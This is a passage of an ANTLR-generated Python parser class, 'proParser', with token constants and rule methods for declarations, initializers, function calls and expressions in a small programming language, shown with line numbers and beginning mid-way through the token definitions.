| T__2=3 105 | T__3=4 106 | T__4=5 107 | T__5=6 108 | T__6=7 109 | T__7=8 110 | T__8=9 111 | T__9=10 112 | T__10=11 113 | T__11=12 114 | T__12=13 115 | T__13=14 116 | T__14=15 117 | T__15=16 118 | T__16=17 119 | T__17=18 120 | T__18=19 121 | T__19=20 122 | T__20=21 123 | T__21=22 124 | Identifier=23 125 | Constant=24 126 | Decimal=25 127 | Hexadecimal=26 128 | String=27 129 | Whitespace=28 130 | LineComment=29 131 | BlockComment=30 132 | 133 | def __init__(self, input): 134 | super(proParser, self).__init__(input) 135 | self.checkVersion("4.5.2") 136 | self._interp = ParserATNSimulator(self, self.atn, self.decisionsToDFA, self.sharedContextCache) 137 | self._predicates = None 138 | 139 | 140 | 141 | class ProgramContext(ParserRuleContext): 142 | 143 | def __init__(self, parser, parent=None, invokingState=-1): 144 | super(proParser.ProgramContext, self).__init__(parent, invokingState) 145 | self.parser = parser 146 | 147 | def Identifier(self): 148 | return self.getToken(proParser.Identifier, 0) 149 | 150 | def statement(self, i=None): 151 | if i is None: 152 | return self.getTypedRuleContexts(proParser.StatementContext) 153 | else: 154 | return self.getTypedRuleContext(proParser.StatementContext,i) 155 | 156 | 157 | def getRuleIndex(self): 158 | return proParser.RULE_program 159 | 160 | def accept(self, visitor): 161 | if hasattr(visitor, "visitProgram"): 162 | return visitor.visitProgram(self) 163 | else: 164 | return visitor.visitChildren(self) 165 | 166 | 167 | 168 | 169 | def program(self): 170 | 171 | localctx = proParser.ProgramContext(self, self._ctx, self.state) 172 | self.enterRule(localctx, 0, self.RULE_program) 173 | self._la = 0 # Token type 174 | try: 175 | self.enterOuterAlt(localctx, 1) 176 | self.state = 34 177 | self.match(proParser.Identifier) 178 | self.state = 35 179 | self.match(proParser.T__0) 180 | self.state = 39 181 | self._errHandler.sync(self) 182 | _la = self._input.LA(1) 183 | while (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << proParser.T__2) | (1 << proParser.T__3) | (1 << proParser.T__4) | (1 << proParser.T__5) | (1 << proParser.T__6) | (1 << proParser.T__7) | (1 << proParser.Identifier))) != 0): 184 | self.state = 36 185 | self.statement() 186 | self.state = 41 187 | self._errHandler.sync(self) 188 | _la = self._input.LA(1) 189 | 190 | self.state = 42 191 | self.match(proParser.T__1) 192 | except RecognitionException as re: 193 | localctx.exception = re 194 | self._errHandler.reportError(self, re) 195 | self._errHandler.recover(self, re) 196 | finally: 197 | self.exitRule() 198 | return localctx 199 | 200 | class StatementContext(ParserRuleContext): 201 | 202 | def __init__(self, parser, parent=None, invokingState=-1): 203 | super(proParser.StatementContext, self).__init__(parent, invokingState) 204 | self.parser = parser 205 | 206 | def call_statement(self): 207 | return self.getTypedRuleContext(proParser.Call_statementContext,0) 208 | 209 | 210 | def declaration(self): 211 | return self.getTypedRuleContext(proParser.DeclarationContext,0) 212 | 213 | 214 | def delimiter(self): 215 | return self.getTypedRuleContext(proParser.DelimiterContext,0) 216 | 217 | 218 | def getRuleIndex(self): 219 | return proParser.RULE_statement 220 | 221 | def accept(self, visitor): 222 | if hasattr(visitor, "visitStatement"): 223 | return visitor.visitStatement(self) 224 | else: 225 | return visitor.visitChildren(self) 226 | 227 | 228 | 229 | 230 | def statement(self): 231 | 232 | localctx = proParser.StatementContext(self, self._ctx, self.state) 233 | self.enterRule(localctx, 2, self.RULE_statement) 234 | try: 235 | self.state = 47 236 | token = self._input.LA(1) 237 | if token in [proParser.Identifier]: 238 | self.enterOuterAlt(localctx, 1) 239 | self.state = 44 240 | self.call_statement() 241 | 242 | elif token in [proParser.T__4, proParser.T__5, proParser.T__6, proParser.T__7]: 243 | self.enterOuterAlt(localctx, 2) 244 | self.state = 45 245 | self.declaration() 246 | 247 | elif token in [proParser.T__2, proParser.T__3]: 248 | self.enterOuterAlt(localctx, 3) 249 | self.state = 46 250 | self.delimiter() 251 | 252 | else: 253 | raise NoViableAltException(self) 254 | 255 | except RecognitionException as re: 256 | localctx.exception = re 257 | self._errHandler.reportError(self, re) 258 | self._errHandler.recover(self, re) 259 | finally: 260 | self.exitRule() 261 | return localctx 262 | 263 | class DelimiterContext(ParserRuleContext): 264 | 265 | def __init__(self, parser, parent=None, invokingState=-1): 266 | super(proParser.DelimiterContext, self).__init__(parent, invokingState) 267 | self.parser = parser 268 | 269 | 270 | def getRuleIndex(self): 271 | return proParser.RULE_delimiter 272 | 273 | def accept(self, visitor): 274 | if hasattr(visitor, "visitDelimiter"): 275 | return visitor.visitDelimiter(self) 276 | else: 277 | return visitor.visitChildren(self) 278 | 279 | 280 | 281 | 282 | def delimiter(self): 283 | 284 | localctx = proParser.DelimiterContext(self, self._ctx, self.state) 285 | self.enterRule(localctx, 4, self.RULE_delimiter) 286 | self._la = 0 # Token type 287 | try: 288 | self.enterOuterAlt(localctx, 1) 289 | self.state = 49 290 | _la = self._input.LA(1) 291 | if not(_la==proParser.T__2 or _la==proParser.T__3): 292 | self._errHandler.recoverInline(self) 293 | else: 294 | self.consume() 295 | except RecognitionException as re: 296 | localctx.exception = re 297 | self._errHandler.reportError(self, re) 298 | self._errHandler.recover(self, re) 299 | finally: 300 | self.exitRule() 301 | return localctx 302 | 303 | class DeclarationContext(ParserRuleContext): 304 | 305 | def __init__(self, parser, parent=None, invokingState=-1): 306 | super(proParser.DeclarationContext, self).__init__(parent, invokingState) 307 | self.parser = parser 308 | 309 | def type_specifier(self): 310 | return self.getTypedRuleContext(proParser.Type_specifierContext,0) 311 | 312 | 313 | def Identifier(self): 314 | return self.getToken(proParser.Identifier, 0) 315 | 316 | def initializer(self): 317 | return self.getTypedRuleContext(proParser.InitializerContext,0) 318 | 319 | 320 | def getRuleIndex(self): 321 | return proParser.RULE_declaration 322 | 323 | def accept(self, visitor): 324 | if hasattr(visitor, "visitDeclaration"): 325 | return visitor.visitDeclaration(self) 326 | else: 327 | return visitor.visitChildren(self) 328 | 329 | 330 | 331 | 332 | def declaration(self): 333 | 334 | localctx = proParser.DeclarationContext(self, self._ctx, self.state) 335 | self.enterRule(localctx, 6, self.RULE_declaration) 336 | self._la = 0 # Token type 337 | try: 338 | self.enterOuterAlt(localctx, 1) 339 | self.state = 51 340 | self.type_specifier() 341 | self.state = 52 342 | self.match(proParser.Identifier) 343 | self.state = 54 344 | _la = self._input.LA(1) 345 | if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << proParser.T__8) | (1 << proParser.T__10) | (1 << proParser.T__12))) != 0): 346 | self.state = 53 347 | self.initializer() 348 | 349 | 350 | except RecognitionException as re: 351 | localctx.exception = re 352 | self._errHandler.reportError(self, re) 353 | self._errHandler.recover(self, re) 354 | finally: 355 | self.exitRule() 356 | return localctx 357 | 358 | class Type_specifierContext(ParserRuleContext): 359 | 360 | def __init__(self, parser, parent=None, invokingState=-1): 361 | super(proParser.Type_specifierContext, self).__init__(parent, invokingState) 362 | self.parser = parser 363 | 364 | 365 | def getRuleIndex(self): 366 | return proParser.RULE_type_specifier 367 | 368 | def accept(self, visitor): 369 | if hasattr(visitor, "visitType_specifier"): 370 | return visitor.visitType_specifier(self) 371 | else: 372 | return visitor.visitChildren(self) 373 | 374 | 375 | 376 | 377 | def type_specifier(self): 378 | 379 | localctx = proParser.Type_specifierContext(self, self._ctx, self.state) 380 | self.enterRule(localctx, 8, self.RULE_type_specifier) 381 | self._la = 0 # Token type 382 | try: 383 | self.enterOuterAlt(localctx, 1) 384 | self.state = 56 385 | _la = self._input.LA(1) 386 | if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << proParser.T__4) | (1 << proParser.T__5) | (1 << proParser.T__6) | (1 << proParser.T__7))) != 0)): 387 | self._errHandler.recoverInline(self) 388 | else: 389 | self.consume() 390 | except RecognitionException as re: 391 | localctx.exception = re 392 | self._errHandler.reportError(self, re) 393 | self._errHandler.recover(self, re) 394 | finally: 395 | self.exitRule() 396 | return localctx 397 | 398 | class InitializerContext(ParserRuleContext): 399 | 400 | def __init__(self, parser, parent=None, invokingState=-1): 401 | super(proParser.InitializerContext, self).__init__(parent, invokingState) 402 | self.parser = parser 403 | 404 | def expression_initializer(self): 405 | return self.getTypedRuleContext(proParser.Expression_initializerContext,0) 406 | 407 | 408 | def array_initializer(self): 409 | return self.getTypedRuleContext(proParser.Array_initializerContext,0) 410 | 411 | 412 | def func_initializer(self): 413 | return self.getTypedRuleContext(proParser.Func_initializerContext,0) 414 | 415 | 416 | def getRuleIndex(self): 417 | return proParser.RULE_initializer 418 | 419 | def accept(self, visitor): 420 | if hasattr(visitor, "visitInitializer"): 421 | return visitor.visitInitializer(self) 422 | else: 423 | return visitor.visitChildren(self) 424 | 425 | 426 | 427 | 428 | def initializer(self): 429 | 430 | localctx = proParser.InitializerContext(self, self._ctx, self.state) 431 | self.enterRule(localctx, 10, self.RULE_initializer) 432 | try: 433 | self.state = 61 434 | token = self._input.LA(1) 435 | if token in [proParser.T__8]: 436 | self.enterOuterAlt(localctx, 1) 437 | self.state = 58 438 | self.expression_initializer() 439 | 440 | elif token in [proParser.T__10]: 441 | self.enterOuterAlt(localctx, 2) 442 | self.state = 59 443 | self.array_initializer() 444 | 445 | elif token in [proParser.T__12]: 446 | self.enterOuterAlt(localctx, 3) 447 | self.state = 60 448 | self.func_initializer() 449 | 450 | else: 451 | raise NoViableAltException(self) 452 | 453 | except RecognitionException as re: 454 | localctx.exception = re 455 | self._errHandler.reportError(self, re) 456 | self._errHandler.recover(self, re) 457 | finally: 458 | self.exitRule() 459 | return localctx 460 | 461 | class Expression_initializerContext(ParserRuleContext): 462 | 463 | def __init__(self, parser, parent=None, invokingState=-1): 464 | super(proParser.Expression_initializerContext, self).__init__(parent, invokingState) 465 | self.parser = parser 466 | 467 | def expression(self): 468 | return self.getTypedRuleContext(proParser.ExpressionContext,0) 469 | 470 | 471 | def getRuleIndex(self): 472 | return proParser.RULE_expression_initializer 473 | 474 | def accept(self, visitor): 475 | if hasattr(visitor, "visitExpression_initializer"): 476 | return visitor.visitExpression_initializer(self) 477 | else: 478 | return visitor.visitChildren(self) 479 | 480 | 481 | 482 | 483 | def expression_initializer(self): 484 | 485 | localctx = proParser.Expression_initializerContext(self, self._ctx, self.state) 486 | self.enterRule(localctx, 12, self.RULE_expression_initializer) 487 | try: 488 | self.enterOuterAlt(localctx, 1) 489 | self.state = 63 490 | self.match(proParser.T__8) 491 | self.state = 64 492 | self.expression() 493 | self.state = 65 494 | self.match(proParser.T__9) 495 | except RecognitionException as re: 496 | localctx.exception = re 497 | self._errHandler.reportError(self, re) 498 | self._errHandler.recover(self, re) 499 | finally: 500 | self.exitRule() 501 | return localctx 502 | 503 | class Array_initializerContext(ParserRuleContext): 504 | 505 | def __init__(self, parser, parent=None, invokingState=-1): 506 | super(proParser.Array_initializerContext, self).__init__(parent, invokingState) 507 | self.parser = parser 508 | 509 | def expression(self): 510 | return self.getTypedRuleContext(proParser.ExpressionContext,0) 511 | 512 | 513 | def getRuleIndex(self): 514 | return proParser.RULE_array_initializer 515 | 516 | def accept(self, visitor): 517 | if hasattr(visitor, "visitArray_initializer"): 518 | return visitor.visitArray_initializer(self) 519 | else: 520 | return visitor.visitChildren(self) 521 | 522 | 523 | 524 | 525 | def array_initializer(self): 526 | 527 | localctx = proParser.Array_initializerContext(self, self._ctx, self.state) 528 | self.enterRule(localctx, 14, self.RULE_array_initializer) 529 | try: 530 | self.enterOuterAlt(localctx, 1) 531 | self.state = 67 532 | self.match(proParser.T__10) 533 | self.state = 68 534 | self.expression() 535 | self.state = 69 536 | self.match(proParser.T__11) 537 | except RecognitionException as re: 538 | localctx.exception = re 539 | self._errHandler.reportError(self, re) 540 | self._errHandler.recover(self, re) 541 | finally: 542 | self.exitRule() 543 | return localctx 544 | 545 | class Func_initializerContext(ParserRuleContext): 546 | 547 | def __init__(self, parser, parent=None, invokingState=-1): 548 | super(proParser.Func_initializerContext, self).__init__(parent, invokingState) 549 | self.parser = parser 550 | 551 | def Identifier(self): 552 | return self.getToken(proParser.Identifier, 0) 553 | 554 | def Constant(self): 555 | return self.getToken(proParser.Constant, 0) 556 | 557 | def String(self): 558 | return self.getToken(proParser.String, 0) 559 | 560 | def getRuleIndex(self): 561 | return proParser.RULE_func_initializer 562 | 563 | def accept(self, visitor): 564 | if hasattr(visitor, "visitFunc_initializer"): 565 | return visitor.visitFunc_initializer(self) 566 | else: 567 | return visitor.visitChildren(self) 568 | 569 | 570 | 571 | 572 | def func_initializer(self): 573 | 574 | localctx = proParser.Func_initializerContext(self, self._ctx, self.state) 575 | self.enterRule(localctx, 16, self.RULE_func_initializer) 576 | self._la = 0 # Token type 577 | try: 578 | self.enterOuterAlt(localctx, 1) 579 | self.state = 71 580 | self.match(proParser.T__12) 581 | self.state = 72 582 | self.match(proParser.Identifier) 583 | self.state = 79 584 | _la = self._input.LA(1) 585 | if _la==proParser.T__13: 586 | self.state = 73 587 | self.match(proParser.T__13) 588 | self.state = 74 589 | self.match(proParser.Constant) 590 | self.state = 77 591 | _la = self._input.LA(1) 592 | if _la==proParser.T__13: 593 | self.state = 75 594 | self.match(proParser.T__13) 595 | self.state = 76 596 | self.match(proParser.String) 597 | 598 | 599 | 600 | 601 | self.state = 81 602 | self.match(proParser.T__14) 603 | except RecognitionException as re: 604 | localctx.exception = re 605 | self._errHandler.reportError(self, re) 606 | self._errHandler.recover(self, re) 607 | finally: 608 | self.exitRule() 609 | return localctx 610 | 611 | class Call_statementContext(ParserRuleContext): 612 | 613 | def __init__(self, parser, parent=None, invokingState=-1): 614 | super(proParser.Call_statementContext, self).__init__(parent, invokingState) 615 | self.parser = parser 616 | 617 | def Identifier(self): 618 | return self.getToken(proParser.Identifier, 0) 619 | 620 | def arguments(self): 621 | return self.getTypedRuleContext(proParser.ArgumentsContext,0) 622 | 623 | 624 | def getRuleIndex(self): 625 | return proParser.RULE_call_statement 626 | 627 | def accept(self, visitor): 628 | if hasattr(visitor, "visitCall_statement"): 629 | return visitor.visitCall_statement(self) 630 | else: 631 | return visitor.visitChildren(self) 632 | 633 | 634 | 635 | 636 | def call_statement(self): 637 | 638 | localctx = proParser.Call_statementContext(self, self._ctx, self.state) 639 | self.enterRule(localctx, 18, self.RULE_call_statement) 640 | self._la = 0 # Token type 641 | try: 642 | self.enterOuterAlt(localctx, 1) 643 | self.state = 83 644 | self.match(proParser.Identifier) 645 | self.state = 84 646 | self.match(proParser.T__8) 647 | self.state = 86 648 | _la = self._input.LA(1) 649 | if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << proParser.T__8) | (1 << proParser.T__21) | (1 << proParser.Identifier) | (1 << proParser.Constant) | (1 << proParser.String))) != 0): 650 | self.state = 85 651 | self.arguments(0) 652 | 653 | 654 | self.state = 88 655 | self.match(proParser.T__9) 656 | except RecognitionException as re: 657 | localctx.exception = re 658 | self._errHandler.reportError(self, re) 659 | self._errHandler.recover(self, re) 660 | finally: 661 | self.exitRule() 662 | return localctx 663 | 664 | class ArgumentsContext(ParserRuleContext): 665 | 666 | def __init__(self, parser, parent=None, invokingState=-1): 667 | super(proParser.ArgumentsContext, self).__init__(parent, invokingState) 668 | self.parser = parser 669 | 670 | def expression(self): 671 | return self.getTypedRuleContext(proParser.ExpressionContext,0) 672 | 673 | 674 | def arguments(self): 675 | return self.getTypedRuleContext(proParser.ArgumentsContext,0) 676 | 677 | 678 | def getRuleIndex(self): 679 | return proParser.RULE_arguments 680 | 681 | def accept(self, visitor): 682 | if hasattr(visitor, "visitArguments"): 683 | return visitor.visitArguments(self) 684 | else: 685 | return visitor.visitChildren(self) 686 | 687 | 688 | 689 | def arguments(self, _p=0): 690 | _parentctx = self._ctx 691 | _parentState = self.state 692 | localctx = proParser.ArgumentsContext(self, self._ctx, _parentState) 693 | _prevctx = localctx 694 | _startState = 20 695 | self.enterRecursionRule(localctx, 20, self.RULE_arguments, _p) 696 | try: 697 | self.enterOuterAlt(localctx, 1) 698 | self.state = 91 699 | self.expression() 700 | self._ctx.stop = self._input.LT(-1) 701 | self.state = 98 702 | self._errHandler.sync(self) 703 | _alt = self._interp.adaptivePredict(self._input,7,self._ctx) 704 | while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER: 705 | if _alt==1: 706 | if self._parseListeners is not None: 707 | self.triggerExitRuleEvent() 708 | _prevctx = localctx 709 | localctx = proParser.ArgumentsContext(self, _parentctx, _parentState) 710 | self.pushNewRecursionContext(localctx, _startState, self.RULE_arguments) 711 | self.state = 93 712 | if not self.precpred(self._ctx, 1): 713 | from antlr4.error.Errors import FailedPredicateException 714 | raise FailedPredicateException(self, "self.precpred(self._ctx, 1)") 715 | self.state = 94 716 | self.match(proParser.T__13) 717 | self.state = 95 718 | self.expression() 719 | self.state = 100 720 | self._errHandler.sync(self) 721 | _alt = self._interp.adaptivePredict(self._input,7,self._ctx) 722 | 723 | except RecognitionException as re: 724 | localctx.exception = re 725 | self._errHandler.reportError(self, re) 726 | self._errHandler.recover(self, re) 727 | finally: 728 | self.unrollRecursionContexts(_parentctx) 729 | return localctx 730 | 731 | class ExpressionContext(ParserRuleContext): 732 | 733 | def __init__(self, parser, parent=None, invokingState=-1): 734 | super(proParser.ExpressionContext, self).__init__(parent, invokingState) 735 | self.parser = parser 736 | 737 | def primary_expression(self): 738 | return self.getTypedRuleContext(proParser.Primary_expressionContext,0) 739 | 740 | 741 | def binary_expression(self): 742 | return self.getTypedRuleContext(proParser.Binary_expressionContext,0) 743 | 744 | 745 | def unary_expression(self): 746 | return self.getTypedRuleContext(proParser.Unary_expressionContext,0) 747 | 748 | 749 | def getRuleIndex(self): 750 | return proParser.RULE_expression 751 | 752 | def accept(self, visitor): 753 | if hasattr(visitor, "visitExpression"): 754 | return visitor.visitExpression(self) 755 | else: 756 | return visitor.visitChildren(self) 757 | 758 | 759 | 760 | 761 | def expression(self): 762 | 763 | localctx = proParser.ExpressionContext(self, self._ctx, self.state) 764 | self.enterRule(localctx, 22, self.RULE_expression) 765 | try: 766 | self.state = 104 767 | self._errHandler.sync(self); 768 | la_ = self._interp.adaptivePredict(self._input,8,self._ctx) 769 | if la_ == 1: 770 | self.enterOuterAlt(localctx, 1) 771 | self.state = 101 772 | self.primary_expression() 773 | pass 774 | 775 | elif la_ == 2: 776 | self.enterOuterAlt(localctx, 2) 777 | self.state = 102 778 | self.binary_expression() 779 | pass 780 | 781 | elif la_ == 3: 782 | self.enterOuterAlt(localctx, 3) 783 | self.state = 103 784 | self.unary_expression() 785 | pass 786 | 787 | 788 | except RecognitionException as re: 789 | localctx.exception = re 790 | self._errHandler.reportError(self, re) 791 | self._errHandler.recover(self, re) 792 | finally: 793 | self.exitRule() 794 | return localctx 795 | 796 | class Binary_expressionContext(ParserRuleContext): 797 | 798 | def __init__(self, parser, parent=None, invokingState=-1): 799 | super(proParser.Binary_expressionContext, self).__init__(parent, invokingState) 800 | self.parser = parser 801 | 802 | def primary_expression(self, i=None): 803 | if i is None: 804 | return self.getTypedRuleContexts(proParser.Primary_expressionContext) 805 | else: 806 | return self.getTypedRuleContext(proParser.Primary_expressionContext,i) 807 | 808 | 809 | def binary_operator(self): 810 | return self.getTypedRuleContext(proParser.Binary_operatorContext,0) 811 | 812 | 813 | def getRuleIndex(self): 814 | return proParser.RULE_binary_expression 815 | 816 | def accept(self, visitor): 817 | if hasattr(visitor, "visitBinary_expression"): 818 | return visitor.visitBinary_expression(self) 819 | else: 820 | return visitor.visitChildren(self) 821 | 822 | 823 | 824 | 825 | def binary_expression(self): 826 | 827 | localctx = proParser.Binary_expressionContext(self, self._ctx, self.state) 828 | self.enterRule(localctx, 24, self.RULE_binary_expression) 829 | try: 830 | self.enterOuterAlt(localctx, 1) 831 | self.state = 106 832 | self.primary_expression() 833 | self.state = 107 834 | self.binary_operator() 835 | self.state = 108 836 | self.primary_expression() 837 | except RecognitionException as re: 838 | localctx.exception = re 839 | self._errHandler.reportError(self, re) 840 | self._errHandler.recover(self, re) 841 | finally: 842 | self.exitRule() 843 | return localctx 844 | 845 | class Unary_expressionContext(ParserRuleContext): 846 | 847 | def __init__(self, parser, parent=None, invokingState=-1): 848 | super(proParser.Unary_expressionContext, self).__init__(parent, invokingState) 849 | self.parser = parser 850 | 851 | def unary_operator(self): 852 | return self.getTypedRuleContext(proParser.Unary_operatorContext,0) 853 | 854 | 855 | def primary_expression(self): 856 | return self.getTypedRuleContext(proParser.Primary_expressionContext,0) 857 | 858 | 859 | def getRuleIndex(self): 860 | return proParser.RULE_unary_expression 861 | 862 | def accept(self, visitor): 863 | if hasattr(visitor, "visitUnary_expression"): 864 | return visitor.visitUnary_expression(self) 865 | else: 866 | return visitor.visitChildren(self) 867 | 868 | 869 | 870 | 871 | def unary_expression(self): 872 | 873 | localctx = proParser.Unary_expressionContext(self, self._ctx, self.state) 874 | self.enterRule(localctx, 26, self.RULE_unary_expression) 875 | try: 876 | self.enterOuterAlt(localctx, 1) 877 | self.state = 110 878 | self.unary_operator() 879 | self.state = 111 880 | self.primary_expression() 881 | except RecognitionException as re: 882 | localctx.exception = re 883 | self._errHandler.reportError(self, re) 884 | self._errHandler.recover(self, re) 885 | finally: 886 | self.exitRule() 887 | return localctx 888 | 889 | class Binary_operatorContext(ParserRuleContext): 890 | 891 | def __init__(self, parser, parent=None, invokingState=-1): 892 | super(proParser.Binary_operatorContext, self).__init__(parent, invokingState) 893 | self.parser = parser 894 | 895 | 896 | def getRuleIndex(self): 897 | return proParser.RULE_binary_operator 898 | 899 | def accept(self, visitor): 900 | if hasattr(visitor, "visitBinary_operator"): 901 | return visitor.visitBinary_operator(self) 902 | else: 903 | return visitor.visitChildren(self) 904 | 905 | 906 | 907 | 908 | def binary_operator(self): 909 | 910 | localctx = proParser.Binary_operatorContext(self, self._ctx, self.state) 911 | self.enterRule(localctx, 28, self.RULE_binary_operator) 912 | self._la = 0 # Token type 913 | try: 914 | self.enterOuterAlt(localctx, 1) 915 | self.state = 113 916 | _la = self._input.LA(1) 917 | if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << proParser.T__15) | (1 << proParser.T__16) | (1 << proParser.T__17) | (1 << proParser.T__18) | (1 << proParser.T__19) | (1 << proParser.T__20) | (1 << proParser.T__21))) != 0)): 918 | self._errHandler.recoverInline(self) 919 | else: 920 | self.consume() 921 | except RecognitionException as re: 922 | localctx.exception = re 923 | self._errHandler.reportError(self, re) 924 | self._errHandler.recover(self, re) 925 | finally: 926 | self.exitRule() 927 | return localctx 928 | 929 | class Unary_operatorContext(ParserRuleContext): 930 | 931 | def __init__(self, parser, parent=None, invokingState=-1): 932 | super(proParser.Unary_operatorContext, self).__init__(parent, invokingState) 933 | self.parser = parser 934 | 935 | 936 | def getRuleIndex(self): 937 | return proParser.RULE_unary_operator 938 | 939 | def accept(self, visitor): 940 | if hasattr(visitor, "visitUnary_operator"): 941 | return visitor.visitUnary_operator(self) 942 | else: 943 | return visitor.visitChildren(self) 944 | 945 | 946 | 947 | 948 | def unary_operator(self): 949 | 950 | localctx = proParser.Unary_operatorContext(self, self._ctx, self.state) 951 | self.enterRule(localctx, 30, self.RULE_unary_operator) 952 | try: 953 | self.enterOuterAlt(localctx, 1) 954 | self.state = 115 955 | self.match(proParser.T__21) 956 | except RecognitionException as re: 957 | localctx.exception = re 958 | self._errHandler.reportError(self, re) 959 | self._errHandler.recover(self, re) 960 | finally: 961 | self.exitRule() 962 | return localctx 963 | 964 | class Primary_expressionContext(ParserRuleContext): 965 | 966 | def __init__(self, parser, parent=None, invokingState=-1): 967 | super(proParser.Primary_expressionContext, self).__init__(parent, invokingState) 968 | self.parser = parser 969 | 970 | def Identifier(self): 971 | return self.getToken(proParser.Identifier, 0) 972 | 973 | def Constant(self): 974 | return self.getToken(proParser.Constant, 0) 975 | 976 | def String(self): 977 | return self.getToken(proParser.String, 0) 978 | 979 | def expression(self): 980 | return self.getTypedRuleContext(proParser.ExpressionContext,0) 981 | 982 | 983 | def getRuleIndex(self): 984 | return proParser.RULE_primary_expression 985 | 986 | def accept(self, visitor): 987 | if hasattr(visitor, "visitPrimary_expression"): 988 | return visitor.visitPrimary_expression(self) 989 | else: 990 | return visitor.visitChildren(self) 991 | 992 | 993 | 994 | 995 | def primary_expression(self): 996 | 997 | localctx = proParser.Primary_expressionContext(self, self._ctx, self.state) 998 | self.enterRule(localctx, 32, self.RULE_primary_expression) 999 | try: 1000 | self.state = 124 1001 | token = self._input.LA(1) 1002 | if token in [proParser.Identifier]: 1003 | self.enterOuterAlt(localctx, 1) 1004 | self.state = 117 1005 | self.match(proParser.Identifier) 1006 | 1007 | elif token in [proParser.Constant]: 1008 | self.enterOuterAlt(localctx, 2) 1009 | self.state = 118 1010 | self.match(proParser.Constant) 1011 | 1012 | elif token in [proParser.String]: 1013 | self.enterOuterAlt(localctx, 3) 1014 | self.state = 119 1015 | self.match(proParser.String) 1016 | 1017 | elif token in [proParser.T__8]: 1018 | self.enterOuterAlt(localctx, 4) 1019 | self.state = 120 1020 | self.match(proParser.T__8) 1021 | self.state = 121 1022 | self.expression() 1023 | self.state = 122 1024 | self.match(proParser.T__9) 1025 | 1026 | else: 1027 | raise NoViableAltException(self) 1028 | 1029 | except RecognitionException as re: 1030 | localctx.exception = re 1031 | self._errHandler.reportError(self, re) 1032 | self._errHandler.recover(self, re) 1033 | finally: 1034 | self.exitRule() 1035 | return localctx 1036 | 1037 | 1038 | 1039 | def sempred(self, localctx, ruleIndex, predIndex): 1040 | if self._predicates == None: 1041 | self._predicates = dict() 1042 | self._predicates[10] = self.arguments_sempred 1043 | pred = self._predicates.get(ruleIndex, None) 1044 | if pred is None: 1045 | raise Exception("No predicate with index:" + str(ruleIndex)) 1046 | else: 1047 | return pred(localctx, predIndex) 1048 | 1049 | def arguments_sempred(self, localctx, predIndex): 1050 | if predIndex == 0: 1051 | return self.precpred(self._ctx, 1) 1052 | 1053 | 1054 | 1055 | 1056 | 1057 | --------------------------------------------------------------------------------